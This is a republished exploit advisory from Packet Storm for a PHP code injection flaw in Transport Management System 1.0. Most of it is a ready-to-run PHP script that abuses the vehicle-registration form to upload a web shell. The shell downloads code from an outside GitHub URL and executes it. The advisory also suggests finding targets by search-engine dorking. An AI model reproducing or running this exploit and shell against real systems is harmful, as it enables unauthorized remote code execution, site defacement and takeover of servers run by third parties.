Transport Management System 1.0 Code Injection
2024-10-5 02:27:4 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

=============================================================================================================================================
| # Title : Transport Management System 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This payload inject php code contains a shell.

[+] save payload as poc.php

[+] usage from cmd : C:\www\test>php 2.php 127.0.0.1/Transport-Management/

[+] payload :

<?php

function file_upload($target_ip) {
$file_name = "indoushka.php";
$webshell_payload = "<?php
\$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';
\$ch = curl_init();
curl_setopt(\$ch, CURLOPT_URL, \$url);
curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);
\$output = curl_exec(\$ch);
curl_close(\$ch);
if (\$output) {
include 'data://text/plain;base64,' . base64_encode(\$output);
}
?>";

$post_fields = array(

'submit' => '',
'vehregno' => '3',
'vehchesis' => '00213771818860',
'vehdescription' => 'hacked by indoushka',
'file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),

'qty' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$target_ip/newvehicle.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
curl_close($ch);

echo "(+) Shell uploaded successfully.\n";
echo "(+) Access the shell at: http://$target_ip/vehicle picture/\n";
}

if ($argc != 2) {
echo "(+) Usage: php " . $argv[0] . " <target ip>\n";
echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";
exit(-1);
}

$target_ip = $argv[1];
file_upload($target_ip);

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================


文章来源: https://packetstormsecurity.com/files/182001/transportms10-exec.txt
如有侵权请联系:admin#unsafe.sh